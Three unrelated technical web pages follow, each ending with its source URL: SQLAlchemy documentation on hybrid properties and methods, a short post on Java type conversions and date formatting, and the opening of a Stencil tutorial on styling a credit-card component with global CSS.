Below, each function decorated with hybrid_method or hybrid_property may receive self as an instance of the class, or as the class itself: from sqlalchemy import Column, Integer from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import Session, aliased from sqlalchemy.ext.hybrid import hybrid_property, hybrid_method Base = declarative_base() class Interval(Base): __tablename__ = 'interval' id = Column(Integer, primary_key=True) start = Column(Integer, nullable=False) end = Column(Integer, nullable=False) def __init__(self, start, end): self.start = start self.end = end @hybrid_property def length(self): return self.end - self.start @hybrid_method def contains(self, point): return (self.start <= point) & (point <= self.end) @hybrid_method def intersects(self, other): return self.contains(other.start) | self.contains(other.end) Above, the length property returns the difference between the end and start attributes. With an instance of Interval, this subtraction occurs in Python, using normal Python descriptor mechanics: >>> i1 = Interval(5, 10) >>> i1.length 5 When dealing with the Interval class itself, the hybrid_property descriptor evaluates the function body given the Interval class as the argument, which when evaluated with SQLAlchemy expression mechanics (here using the QueryableAttribute.expression accessor) returns a new SQL expression: >>> print(Interval.length.expression) interval."end" - interval.start >>> print(Session().query(Interval).filter(Interval.length > 10)) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE interval."end" - interval.start > :param_1 ORM methods such as Query.filter_by() generally use getattr() to locate attributes, so can also be used with hybrid attributes: >>> print(Session().query(Interval).filter_by(length=5)) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE 
interval."end" - interval.start = :param_1 The Interval class example also illustrates two methods, contains() and intersects(), decorated with hybrid_method. This decorator applies the same idea to methods that hybrid_property applies to attributes. The methods return boolean values, and take advantage of the Python | and & bitwise operators to produce equivalent instance-level and SQL expression-level boolean behavior: >>> i1.contains(6) True >>> i1.contains(15) False >>> i1.intersects(Interval(7, 18)) True >>> i1.intersects(Interval(25, 29)) False >>> print(Session().query(Interval).filter(Interval.contains(15))) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE interval.start <= :start_1 AND interval."end" > :end_1 >>> ia = aliased(Interval) >>> print(Session().query(Interval, ia).filter(Interval.intersects(ia))) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end, interval_1.id AS interval_1_id, interval_1.start AS interval_1_start, interval_1."end" AS interval_1_end FROM interval, interval AS interval_1 WHERE interval.start <= interval_1.start AND interval."end" > interval_1.start OR interval.start <= interval_1."end" AND interval."end" > interval_1."end" Defining Expression Behavior Distinct from Attribute Behavior¶ Our usage of the & and | bitwise operators above was fortunate, considering our functions operated on two boolean values to return a new one. In many cases, the construction of an in-Python function and a SQLAlchemy SQL expression have enough differences that two separate Python expressions should be defined. The hybrid decorators define the hybrid_property.expression() modifier for this purpose. As an example we'll define the radius of the interval, which requires the usage of the absolute value function: from sqlalchemy import func class Interval(object): # ...
@hybrid_property def radius(self): return abs(self.length) / 2 @radius.expression def radius(cls): return func.abs(cls.length) / 2 Above, the Python function abs() is used for instance-level operations, while the SQL function ABS() is used via the func object for class-level expressions: >>> i1.radius 2 >>> print(Session().query(Interval).filter(Interval.radius > 5)) SELECT interval.id AS interval_id, interval.start AS interval_start, interval."end" AS interval_end FROM interval WHERE abs(interval."end" - interval.start) / :abs_1 > :param_1 Note When defining an expression for a hybrid property or method, the expression method must retain the name of the original hybrid, else the new hybrid with the additional state will be attached to the class with the non-matching name. To use the example above: class Interval(object): # ... @hybrid_property def radius(self): return abs(self.length) / 2 # WRONG - the non-matching name will cause this function to be # ignored @radius.expression def radius_expression(cls): return func.abs(cls.length) / 2 This is also true for other mutator methods, such as hybrid_property.update_expression(). This is the same behavior as that of the @property construct that is part of standard Python. Defining Setters¶ Hybrid properties can also define setter methods. If we wanted length above, when set, to modify the endpoint value: class Interval(object): # ... @hybrid_property def length(self): return self.end - self.start @length.setter def length(self, value): self.end = self.start + value The length(self, value) method is now called upon set: >>> i1 = Interval(5, 10) >>> i1.length 5 >>> i1.length = 12 >>> i1.end 17 Allowing Bulk ORM Update¶ A hybrid can define a custom "UPDATE" handler for when using the Query.update() method, allowing the hybrid to be used in the SET clause of the update. Normally, when using a hybrid with Query.update(), the SQL expression is used as the column that's the target of the SET.
If our Interval class had a hybrid start_point that linked to Interval.start, this could be substituted directly: session.query(Interval).update({Interval.start_point: 10}) However, when using a composite hybrid like Interval.length, this hybrid represents more than one column. We can set up a handler that will accommodate a value passed to Query.update() which can affect this, using the hybrid_property.update_expression() decorator. A handler that works similarly to our setter would be: class Interval(object): # ... @hybrid_property def length(self): return self.end - self.start @length.setter def length(self, value): self.end = self.start + value @length.update_expression def length(cls, value): return [ (cls.end, cls.start + value) ] Above, if we use Interval.length in an UPDATE expression as: session.query(Interval).update( {Interval.length: 25}, synchronize_session='fetch') We’ll get an UPDATE statement along the lines of: UPDATE interval SET end=start + :value In some cases, the default “evaluate” strategy can’t perform the SET expression in Python; while the addition operator we’re using above is supported, for more complex SET expressions it will usually be necessary to use either the “fetch” or False synchronization strategy as illustrated above. Note For ORM bulk updates to work with hybrids, the function name of the hybrid must match that of how it is accessed. Something like this wouldn’t work: class Interval(object): # ... def _get(self): return self.end - self.start def _set(self, value): self.end = self.start + value def _update_expr(cls, value): return [ (cls.end, cls.start + value) ] length = hybrid_property( fget=_get, fset=_set, update_expr=_update_expr ) The Python descriptor protocol does not provide any reliable way for a descriptor to know what attribute name it was accessed as, and the UPDATE scheme currently relies upon being able to access the attribute from an instance by name in order to perform the instance synchronization step. 
New in version 1.2: added support for bulk updates to hybrid properties. Working with Relationships¶ There's no essential difference when creating hybrids that work with related objects as opposed to column-based data. The need for distinct expressions tends to be greater. The two variants we'll illustrate are the "join-dependent" hybrid, and the "correlated subquery" hybrid. Join-Dependent Relationship Hybrid¶ Consider the following declarative mapping which relates a User to a SavingsAccount: from sqlalchemy import Column, Integer, ForeignKey, Numeric, String from sqlalchemy.orm import relationship from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.ext.hybrid import hybrid_property Base = declarative_base() class SavingsAccount(Base): __tablename__ = 'account' id = Column(Integer, primary_key=True) user_id = Column(Integer, ForeignKey('user.id'), nullable=False) balance = Column(Numeric(15, 5)) class User(Base): __tablename__ = 'user' id = Column(Integer, primary_key=True) name = Column(String(100), nullable=False) accounts = relationship("SavingsAccount", backref="owner") @hybrid_property def balance(self): if self.accounts: return self.accounts[0].balance else: return None @balance.setter def balance(self, value): if not self.accounts: account = SavingsAccount(owner=self) else: account = self.accounts[0] account.balance = value @balance.expression def balance(cls): return SavingsAccount.balance The above hybrid property balance works with the first SavingsAccount entry in the list of accounts for this user. The in-Python getter/setter methods can treat accounts as a Python list available on self. However, at the expression level, it's expected that the User class will be used in an appropriate context such that an appropriate join to SavingsAccount will be present: >>> print(Session().query(User, User.balance). ... join(User.accounts).filter(User.balance > 5000)) SELECT "user".id AS user_id, "user".name AS user_name, account.balance AS account_balance FROM "user" JOIN account ON "user".id = account.user_id WHERE account.balance > :balance_1 Note however, that while the instance level accessors need to worry about whether self.accounts is even present, this issue expresses itself differently at the SQL expression level, where we basically would use an outer join: >>> from sqlalchemy import or_ >>> print (Session().query(User, User.balance).outerjoin(User.accounts). ...
filter(or_(User.balance < 5000, User.balance == None))) SELECT "user".id AS user_id, "user".name AS user_name, account.balance AS account_balance FROM "user" LEFT OUTER JOIN account ON "user".id = account.user_id WHERE account.balance < :balance_1 OR account.balance IS NULL Correlated Subquery Relationship Hybrid¶ We can, of course, forego being dependent on the enclosing query's usage of joins in favor of the correlated subquery, which can portably be packed into a single column expression. A correlated subquery is more portable, but often performs more poorly at the SQL level. Using the same technique illustrated at Using column_property, we can adjust our SavingsAccount example to aggregate the balances for all accounts, and use a correlated subquery for the column expression: from sqlalchemy import Column, Integer, ForeignKey, Numeric, String from sqlalchemy.orm import relationship from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy import select, func Base = declarative_base() class SavingsAccount(Base): __tablename__ = 'account' id = Column(Integer, primary_key=True) user_id = Column(Integer, ForeignKey('user.id'), nullable=False) balance = Column(Numeric(15, 5)) class User(Base): __tablename__ = 'user' id = Column(Integer, primary_key=True) name = Column(String(100), nullable=False) accounts = relationship("SavingsAccount", backref="owner") @hybrid_property def balance(self): return sum(acc.balance for acc in self.accounts) @balance.expression def balance(cls): return select(func.sum(SavingsAccount.balance)).\ where(SavingsAccount.user_id==cls.id).\ label('total_balance') The above recipe will give us the balance column which renders a correlated SELECT: >>> print(s.query(User).filter(User.balance > 400)) SELECT "user".id AS user_id, "user".name AS user_name FROM "user" WHERE (SELECT sum(account.balance) AS sum_1 FROM account WHERE account.user_id = "user".id) > :param_1 Building Custom Comparators¶ The hybrid property also includes a helper that allows construction of custom comparators. A comparator object allows one to customize the behavior of each SQLAlchemy expression operator individually. They are useful when creating custom types that have some highly idiosyncratic behavior on the SQL side.
Note The hybrid_property.comparator() decorator introduced in this section replaces the use of the hybrid_property.expression() decorator. They cannot be used together. The example class below allows case-insensitive comparisons on the attribute named word_insensitive: from sqlalchemy.ext.hybrid import Comparator, hybrid_property from sqlalchemy import func, Column, Integer, String from sqlalchemy.orm import Session from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() class CaseInsensitiveComparator(Comparator): def __eq__(self, other): return func.lower(self.__clause_element__()) == func.lower(other) class SearchWord(Base): __tablename__ = 'searchword' id = Column(Integer, primary_key=True) word = Column(String(255), nullable=False) @hybrid_property def word_insensitive(self): return self.word.lower() @word_insensitive.comparator def word_insensitive(cls): return CaseInsensitiveComparator(cls.word) Above, SQL expressions against word_insensitive will apply the LOWER() SQL function to both sides: >>> print(Session().query(SearchWord).filter_by(word_insensitive="Trucks")) SELECT searchword.id AS searchword_id, searchword.word AS searchword_word FROM searchword WHERE lower(searchword.word) = lower(:lower_1) The CaseInsensitiveComparator above implements part of the ColumnOperators interface. A “coercion” operation like lowercasing can be applied to all comparison operations (i.e. eq, lt, gt, etc.) using Operators.operate(): class CaseInsensitiveComparator(Comparator): def operate(self, op, other): return op(func.lower(self.__clause_element__()), func.lower(other)) Reusing Hybrid Properties across Subclasses¶ A hybrid can be referred to from a superclass, to allow modifying methods like hybrid_property.getter(), hybrid_property.setter() to be used to redefine those methods on a subclass. 
This is similar to how the standard Python @property object works: class FirstNameOnly(Base): # ... first_name = Column(String) @hybrid_property def name(self): return self.first_name @name.setter def name(self, value): self.first_name = value class FirstNameLastName(FirstNameOnly): # ... last_name = Column(String) @FirstNameOnly.name.getter def name(self): return self.first_name + ' ' + self.last_name @name.setter def name(self, value): self.first_name, self.last_name = value.split(' ', 1) Above, the FirstNameLastName class refers to the hybrid from FirstNameOnly.name to repurpose its getter and setter for the subclass. When overriding hybrid_property.expression() and hybrid_property.comparator() alone as the first reference to the superclass, these names conflict with the same-named accessors on the class-level QueryableAttribute object returned at the class level. To override these methods when referring directly to the parent class descriptor, add the special qualifier hybrid_property.overrides, which will de-reference the instrumented attribute back to the hybrid object: class FirstNameLastName(FirstNameOnly): # ... last_name = Column(String) @FirstNameOnly.name.overrides.expression def name(cls): return func.concat(cls.first_name, ' ', cls.last_name) New in version 1.2: Added hybrid_property.getter() as well as the ability to redefine accessors per-subclass. Hybrid Value Objects¶ Note in our previous example, if we were to compare the word_insensitive attribute of a SearchWord instance to a plain Python string, the plain Python string would not be coerced to lower case - the CaseInsensitiveComparator we built, being returned by @word_insensitive.comparator, only applies to the SQL side. A more comprehensive form of the custom comparator is to construct a Hybrid Value Object. This technique applies the target value or expression to a value object which is then returned by the accessor in all cases. The value object allows control of all operations upon the value as well as how compared values are treated, both on the SQL expression side as well as the Python value side. Replacing the previous CaseInsensitiveComparator class with a new CaseInsensitiveWord class: class CaseInsensitiveWord(Comparator): "Hybrid value representing a lower case representation of a word."
def __init__(self, word): if isinstance(word, basestring): self.word = word.lower() elif isinstance(word, CaseInsensitiveWord): self.word = word.word else: self.word = func.lower(word) def operate(self, op, other): if not isinstance(other, CaseInsensitiveWord): other = CaseInsensitiveWord(other) return op(self.word, other.word) def __clause_element__(self): return self.word def __str__(self): return self.word key = 'word' "Label to apply to Query tuple results" Above, the CaseInsensitiveWord object represents self.word, which may be a SQL function, or may be a Python native. By overriding operate() and __clause_element__() to work in terms of self.word, all comparison operations will work against the “converted” form of word, whether it be SQL side or Python side. Our SearchWord class can now deliver the CaseInsensitiveWord object unconditionally from a single hybrid call: class SearchWord(Base): __tablename__ = 'searchword' id = Column(Integer, primary_key=True) word = Column(String(255), nullable=False) @hybrid_property def word_insensitive(self): return CaseInsensitiveWord(self.word) The word_insensitive attribute now has case-insensitive comparison behavior universally, including SQL expression vs. Python expression (note the Python value is converted to lower case on the Python side here): >>> print(Session().query(SearchWord).filter_by(word_insensitive="Trucks")) SELECT searchword.id AS searchword_id, searchword.word AS searchword_word FROM searchword WHERE lower(searchword.word) = :lower_1 SQL expression versus SQL expression: >>> sw1 = aliased(SearchWord) >>> sw2 = aliased(SearchWord) >>> print(Session().query( ... sw1.word_insensitive, ... sw2.word_insensitive).\ ... filter( ... sw1.word_insensitive > sw2.word_insensitive ... 
)) SELECT lower(searchword_1.word) AS lower_1, lower(searchword_2.word) AS lower_2 FROM searchword AS searchword_1, searchword AS searchword_2 WHERE lower(searchword_1.word) > lower(searchword_2.word) Python only expression: >>> ws1 = SearchWord(word="SomeWord") >>> ws1.word_insensitive == "sOmEwOrD" True >>> ws1.word_insensitive == "XOmEwOrX" False >>> print(ws1.word_insensitive) someword The Hybrid Value pattern is very useful for any kind of value that may have multiple representations, such as timestamps, time deltas, units of measurement, currencies and encrypted passwords. See also Hybrids and Value Agnostic Types - on the techspot.zzzeek.org blog Value Agnostic Types, Part II - on the techspot.zzzeek.org blog Building Transformers¶ A transformer is an object which can receive a Query object and return a new one. The Query object includes a method with_transformation() that returns a new Query transformed by the given function. We can combine this with the Comparator class to produce one type of recipe which can both set up the FROM clause of a query as well as assign filtering criterion. Consider a mapped class Node, which assembles using adjacency list into a hierarchical tree pattern: from sqlalchemy import Column, Integer, ForeignKey from sqlalchemy.orm import relationship from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() class Node(Base): __tablename__ = 'node' id = Column(Integer, primary_key=True) parent_id = Column(Integer, ForeignKey('node.id')) parent = relationship("Node", remote_side=id) Suppose we wanted to add an accessor grandparent. This would return the parent of Node.parent. When we have an instance of Node, this is simple: from sqlalchemy.ext.hybrid import hybrid_property class Node(Base): # ... @hybrid_property def grandparent(self): return self.parent.parent For the expression, things are not so clear. We’d need to construct a Query where we Query.join() twice along Node.parent to get to the grandparent. 
We can instead return a transforming callable that we'll combine with the Comparator class to receive any Query object, and return a new one that's joined to the Node.parent attribute and filtered based on the given criterion: from sqlalchemy.ext.hybrid import Comparator class GrandparentTransformer(Comparator): def operate(self, op, other): def transform(q): cls = self.__clause_element__() parent_alias = aliased(cls) return q.join(parent_alias, cls.parent).\ filter(op(parent_alias.parent, other)) return transform Base = declarative_base() class Node(Base): __tablename__ = 'node' id = Column(Integer, primary_key=True) parent_id = Column(Integer, ForeignKey('node.id')) parent = relationship("Node", remote_side=id) @hybrid_property def grandparent(self): return self.parent.parent @grandparent.comparator def grandparent(cls): return GrandparentTransformer(cls) The GrandparentTransformer overrides the core Operators.operate() method at the base of the Comparator hierarchy to return a query-transforming callable, which then runs the given comparison operation in a particular context. In the example above, for instance, the operate method is called with the Operators.eq callable as well as the right side of the comparison, Node(id=5). A function transform is then returned which will transform a Query first to join to Node.parent, then to compare parent_alias using Operators.eq against the left and right sides, passing into Query.filter(): >>> from sqlalchemy.orm import Session >>> session = Session() >>> session.query(Node).\ ... with_transformation(Node.grandparent==Node(id=5)).\ ... all() SELECT node.id AS node_id, node.parent_id AS node_parent_id FROM node JOIN node AS node_1 ON node_1.id = node.parent_id WHERE :param_1 = node_1.parent_id We can modify the pattern to be more verbose but flexible by separating the "join" step from the "filter" step.
The tricky part here is ensuring that successive instances of GrandparentTransformer use the same AliasedClass object against Node. Below we use a simple memoizing approach that associates a GrandparentTransformer with each class: class Node(Base): # ... @grandparent.comparator def grandparent(cls): # memoize a GrandparentTransformer # per class if '_gp' not in cls.__dict__: cls._gp = GrandparentTransformer(cls) return cls._gp class GrandparentTransformer(Comparator): def __init__(self, cls): self.parent_alias = aliased(cls) @property def join(self): def go(q): return q.join(self.parent_alias, Node.parent) return go def operate(self, op, other): return op(self.parent_alias.parent, other) The “transformer” pattern is an experimental pattern that starts to make usage of some functional programming paradigms. While it’s only recommended for advanced and/or patient developers, there’s probably a whole lot of amazing things it can be used for. API Reference¶ - class sqlalchemy.ext.hybrid.hybrid_method(func, expr=None)¶ A decorator which allows definition of a Python object method with both instance-level and class-level behavior. Class signature class sqlalchemy.ext.hybrid.hybrid_method( sqlalchemy.orm.base.InspectionAttrInfo) - method sqlalchemy.ext.hybrid.hybrid_method.__init__(func, expr=None)¶ Create a new hybrid_method. Usage is typically via decorator: from sqlalchemy.ext.hybrid import hybrid_method class SomeClass(object): @hybrid_method def value(self, x, y): return self._value + x + y @value.expression def value(self, x, y): return func.some_function(self._value, x, y) - method sqlalchemy.ext.hybrid.hybrid_method.expression(expr)¶ Provide a modifying decorator that defines a SQL-expression producing method. - attribute sqlalchemy.ext.hybrid.hybrid_method.extension_type = symbol('HYBRID_METHOD')¶ The extension type, if any. 
Defaults to NOT_EXTENSION - class sqlalchemy.ext.hybrid.hybrid_property(fget, fset=None, fdel=None, expr=None, custom_comparator=None, update_expr=None)¶ A decorator which allows definition of a Python descriptor with both instance-level and class-level behavior. Class signature class sqlalchemy.ext.hybrid.hybrid_property( sqlalchemy.orm.base.InspectionAttrInfo) - method sqlalchemy.ext.hybrid.hybrid_property.__init__(fget, fset=None, fdel=None, expr=None, custom_comparator=None, update_expr=None)¶ Create a new hybrid_property. Usage is typically via decorator: from sqlalchemy.ext.hybrid import hybrid_property class SomeClass(object): @hybrid_property def value(self): return self._value @value.setter def value(self, value): self._value = value - method sqlalchemy.ext.hybrid.hybrid_property.comparator(comparator)¶ Provide a modifying decorator that defines a custom comparator producing method. The return value of the decorated method should be an instance of Comparator. Note The hybrid_property.comparator() decorator replaces the use of the hybrid_property.expression() decorator. They cannot be used together. When a hybrid is invoked at the class level, the Comparator object returned by this method is used as the comparator for the class-level expression. Note When referring to a hybrid property from an owning class (e.g. SomeClass.some_hybrid), an instance of QueryableAttribute is returned, representing the expression or comparator object as well as this hybrid object. However, that object itself has accessors called expression and comparator; so when attempting to override these decorators on a subclass, it may be necessary to qualify it using the hybrid_property.overrides modifier first. See that modifier for details. - method sqlalchemy.ext.hybrid.hybrid_property.deleter(fdel)¶ Provide a modifying decorator that defines a deletion method. - method sqlalchemy.ext.hybrid.hybrid_property.expression(expr)¶ Provide a modifying decorator that defines a SQL-expression producing method.
When a hybrid is invoked at the class level, the SQL expression returned by this method is used as the class-level expression. Note When referring to a hybrid property from an owning class (e.g. SomeClass.some_hybrid), an instance of QueryableAttribute is returned, representing the expression or comparator object as well as this hybrid object. However, that object itself has accessors called expression and comparator; so when attempting to override these decorators on a subclass, it may be necessary to qualify it using the hybrid_property.overrides modifier first. See that modifier for details. - attribute sqlalchemy.ext.hybrid.hybrid_property.extension_type = symbol('HYBRID_PROPERTY')¶ The extension type, if any. Defaults to NOT_EXTENSION - method sqlalchemy.ext.hybrid.hybrid_property.getter(fget)¶ Provide a modifying decorator that defines a getter method. New in version 1.2. - attribute sqlalchemy.ext.hybrid.hybrid_property.overrides¶ Prefix for a method that is overriding an existing attribute. The hybrid_property.overrides accessor just returns this hybrid object, which when called at the class level from a parent class, will de-reference the "instrumented attribute" normally returned at this level, and allow modifying decorators like hybrid_property.expression() and hybrid_property.comparator() to be used without conflicting with the same-named attributes normally present on the QueryableAttribute: class SuperClass(object): # ... @hybrid_property def foobar(self): return self._foobar class SubClass(SuperClass): # ... @SuperClass.foobar.overrides.expression def foobar(cls): return func.subfoobar(cls._foobar) New in version 1.2. - method sqlalchemy.ext.hybrid.hybrid_property.setter(fset)¶ Provide a modifying decorator that defines a setter method. - method sqlalchemy.ext.hybrid.hybrid_property.update_expression(meth)¶ Provide a modifying decorator that defines an UPDATE tuple producing method.
  The method accepts a single value, which is the value to be rendered into the SET clause of an UPDATE statement. The method should then process this value into individual column expressions that fit into the ultimate SET clause, and return them as a sequence of 2-tuples. Each tuple contains a column expression as the key and a value to be rendered. E.g.:

  class Person(Base):
      # ...

      first_name = Column(String)
      last_name = Column(String)

      @hybrid_property
      def fullname(self):
          return self.first_name + " " + self.last_name

      @fullname.update_expression
      def fullname(cls, value):
          fname, lname = value.split(" ", 1)
          return [
              (cls.first_name, fname),
              (cls.last_name, lname),
          ]

  New in version 1.2.

- class sqlalchemy.ext.hybrid.Comparator(expression)¶

  A helper class that allows easy construction of custom PropComparator classes for usage with hybrids.

  Class signature: class sqlalchemy.ext.hybrid.Comparator (sqlalchemy.orm.PropComparator)

- sqlalchemy.ext.hybrid.HYBRID_METHOD = symbol('HYBRID_METHOD')¶

  Symbol indicating an InspectionAttr that’s of type hybrid_method. Is assigned to the InspectionAttr.extension_type attribute.

  See also: Mapper.all_orm_attributes

- sqlalchemy.ext.hybrid.HYBRID_PROPERTY = symbol('HYBRID_PROPERTY')¶

  Symbol indicating an InspectionAttr that’s of type hybrid_property. Is assigned to the InspectionAttr.extension_type attribute.

  See also: Mapper.all_orm_attributes
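Of the modifiers above, comparator() is the only one without an inline example. Here is a sketch, adapted from the case-insensitive comparator example in the SQLAlchemy hybrid documentation (the model and comparator names come from that example):

```python
# Sketch of hybrid_property.comparator(): a case-insensitive comparison
# that behaves differently at the instance level and the class level.
from sqlalchemy import Column, Integer, String, func
from sqlalchemy.ext.hybrid import Comparator, hybrid_property
from sqlalchemy.orm import declarative_base

Base = declarative_base()


class CaseInsensitiveComparator(Comparator):
    # Class-level comparisons wrap both sides in SQL lower().
    def __eq__(self, other):
        return func.lower(self.__clause_element__()) == func.lower(other)


class SearchWord(Base):
    __tablename__ = "searchword"
    id = Column(Integer, primary_key=True)
    word = Column(String(255), nullable=False)

    @hybrid_property
    def word_insensitive(self):
        # Instance-level behavior: plain Python lowercasing.
        return self.word.lower()

    @word_insensitive.comparator
    def word_insensitive(cls):
        # Class-level behavior: the custom Comparator is used in place
        # of a plain SQL expression.
        return CaseInsensitiveComparator(cls.word)
```

With this in place, `SearchWord.word_insensitive == "Trucks"` renders SQL along the lines of `lower(searchword.word) = lower(:lower_1)`, while `instance.word_insensitive` simply lowercases in Python.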
https://docs.sqlalchemy.org/en/14/orm/extensions/hybrid.html
Some of our test data needs to be transformed from its original type to something else. For example, we might need to convert a String to a numeric value, or vice versa. Or we might need to generate date values in a certain format. Examples for all of these can be found below.

String to int
The code: Integer.parseInt(theString), assigned to a variable of type int.
Example: int resultingInt = Integer.parseInt("6");
Value stored in the variable: 6

Int to String
The code: String.valueOf(theInt), assigned to a variable of type String.
Example: String resultingString = String.valueOf(200);
Value stored in the variable: "200"

String to double
The code: Double.parseDouble(theString), assigned to a variable of type double.
Example: double resultingDouble = Double.parseDouble("333.55");
Value stored in the variable: 333.55

Double to String
The code: String.valueOf(theDouble), assigned to a variable of type String.
Example: String resultingString = String.valueOf(333.55);
Value stored in the variable: "333.55"

Note: String.valueOf() can also be used to convert float and long values to String. Similarly, to convert String values to float you can use Float.parseFloat(), or Long.parseLong() to convert String values to long.

Time/date formatting
When working with dates, we usually want to convert a date value to a specific format. This can be done in Java 8 and above using DateTimeFormatter. For example, we might want to generate the current date and time in the format “yyyy-MM-dd HH:mm:ss” — that is, year-month-day hour (in 24-hour format):minutes:seconds — and save this value to a String variable. To generate the current time, several approaches can be used. The first one, exemplified below, uses LocalDateTime.now().
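Before moving on to dates — one pitfall the conversion snippets above leave out: Integer.parseInt and Double.parseDouble throw NumberFormatException on malformed input. A small defensive sketch (SafeConvert and toIntOrDefault are illustrative names, not JDK APIs):

```java
// Sketch: defensive numeric parsing for untrusted test data.
public class SafeConvert {

    // Returns Integer.parseInt(s), or the fallback when s is null or malformed.
    public static int toIntOrDefault(String s, int fallback) {
        if (s == null) {
            return fallback;
        }
        try {
            return Integer.parseInt(s.trim());
        } catch (NumberFormatException e) {
            return fallback;
        }
    }

    public static void main(String[] args) {
        System.out.println(toIntOrDefault("6", -1));     // prints 6
        System.out.println(toIntOrDefault("oops", -1));  // prints -1
    }
}
```

The same pattern applies to Double.parseDouble, Float.parseFloat and Long.parseLong, all of which throw the same exception.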
To use Java’s LocalDateTime and DateTimeFormatter in a test, we need to add the following imports to the test class:

import java.time.LocalDateTime;
import java.time.format.DateTimeFormatter;

The code used for generating the date and time in the desired format as a String is:

String formattedDate = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss").format(LocalDateTime.now());

The resulting String looks like: 2019-11-05 20:22:47

In case we are only interested in the year, month and day, we can omit the hour/minute/second part of the pattern used with DateTimeFormatter, as follows:

String formattedWithoutHour = DateTimeFormatter.ofPattern("yyyy-MM-dd").format(LocalDateTime.now());

In this case the result looks like: 2019-10-21
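Parsing in the other direction works with the same formatter via LocalDateTime.parse. A sketch using a fixed date so the output is deterministic (DateRoundTrip and its helper methods are illustrative names):

```java
import java.time.LocalDateTime;
import java.time.format.DateTimeFormatter;

public class DateRoundTrip {
    private static final DateTimeFormatter FMT =
            DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss");

    // Formats the given date-time fields using the post's pattern.
    public static String format(int year, int month, int day,
                                int hour, int minute, int second) {
        return FMT.format(LocalDateTime.of(year, month, day, hour, minute, second));
    }

    // True when the String parses and reformats back to itself,
    // i.e. it fully matches the pattern.
    public static boolean roundTrips(String text) {
        LocalDateTime parsed = LocalDateTime.parse(text, FMT);
        return FMT.format(parsed).equals(text);
    }

    public static void main(String[] args) {
        String s = format(2019, 11, 5, 20, 22, 47);
        System.out.println(s);              // prints 2019-11-05 20:22:47
        System.out.println(roundTrips(s));  // prints true
    }
}
```

A round-trip check like this is a handy sanity test when a pattern String is edited, since a mismatch between pattern and data fails at parse time with a DateTimeParseException.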
https://imalittletester.com/2019/10/09/useful-type-conversions/?shared=email&msg=fail
No matter what kind of component you’re building, every component needs styles. In this tutorial, we’re going to take a deep dive into styling components using Stencil. We’ll learn how to implement global styles in Stencil, which helps us keep our components visually consistent when building a design system. We’ll also cover a lot of exciting CSS topics like gradients, animations, pseudo-elements, and more — so if that sounds interesting to you, let’s jump on in!

You can find all of the code for this tutorial at the Stencil CSS Github repository here.

NOTE: This tutorial assumes that you have a fundamental understanding of building components in Stencil. This tutorial will emphasize the CSS-related aspects of building a component in Stencil.

Creating Our Stencil Component

To illustrate all of these CSS topics, we’re going to be building a credit card component. This kind of component could be used to display a user’s stored credit cards, or can even be modified to serve as a fun way to input credit card information. Here’s what the final component will look like. Speaking of the final component, here’s how it will be used in HTML:

<credit-card card-number="…" card-holder="…" expiration-date="…" cvv="…" gradient="…"></credit-card>

As you can see, our credit card component is going to have five properties. The first four props, card-number, card-holder, expiration-date, and cvv, are all aspects of a credit card that vary from card to card. The final prop, gradient, will be used to specify which gradient background we want to use for the credit card. We’ll discuss in more detail how this will work later in the tutorial. Keeping this in mind, let’s create a new Stencil component and take in these values as props.
@Component({
  tag: 'credit-card',
  styleUrl: 'credit-card.css',
  shadow: true,
})
export class CreditCard {
  @Prop() cardNumber: string;
  @Prop() cardHolder: string;
  @Prop() expirationDate: string;
  @Prop() cvv: string;
  @Prop() gradient: 'purple' | 'green' | 'orange';

Because our component is largely presentational, we’ll take in all of these values as strings so we can display them on our credit card. Next, let’s write our JSX to create the structure of our credit card.

render() {
  return (
    <Host>
      <a href="/" class="card-wrapper">
        <div class="front">
          <div class="row">
            <p>Credit</p>
            <img src="…" alt="logo" />
          </div>
          <div class="row">
            {this.cardNumber.split(' ').map(number => (
              <p class="card-number">{number}</p>
            ))}
          </div>
          <div class="row">
            <p class="cardholder">{this.cardHolder}</p>
            <p class="exp-date">{this.expirationDate}</p>
          </div>
        </div>
        <div class="back">
          <p>Security Code</p>
          <p class="cvv">{this.cvv}</p>
        </div>
      </a>
    </Host>
  );
}

One thing to note here is that we are using the split method on the cardNumber to display the cardNumber in groups of four digits. Because we use a space (' ') as our delimiter, the cardNumber has to be set with a space after every four digits. The rest of the JSX just displays the values we took as props in an organized way. With our props and JSX set, we’re ready to get into the fun part…styling!

Global Styles

When building out a design system, we want most of our styles to be directly tied to our components. This ensures that our components are modular, which makes them easier to manage, debug, and scale. However, there are some styles that we want to share between our components in order to have a consistent look and feel across our design system. The styles you decide to share across components are entirely up to you, but usually they include things like colors, typography, spacing, etc. In order for us to share these styles across our design system, we need global styles.
These global styles will be made available to all our components for consistency. Fortunately for us, Stencil has built-in support for a global stylesheet. Here’s how we can create a global stylesheet:

- Create a new folder called global under the src directory of your Stencil project
- Create a new file called global.css in the global folder you just created
- In your stencil.config.ts file, specify the global style option globalStyle: 'src/global/global.css'
- In the head of your index.html file, add a link to your global stylesheet <link rel="stylesheet" href="/build/{YOUR_PROJECT_NAME}.css" />. Be sure to replace {YOUR_PROJECT_NAME} with the name of your Stencil project.

Now our global styles are available for us to use! So now let’s open up global.css and add some styles.

@import url('…');

html,
body {
  font-family: 'Roboto', sans-serif;
}

:root {
  --font-color: #fff;
  --purple-gradient: linear-gradient(to right bottom, #a460f8, #4c48ff);
  --green-gradient: linear-gradient(to right bottom, #20e3b2, #0bc2c2);
  --orange-gradient: linear-gradient(to right bottom, #f9b523, #ff4e50);
}

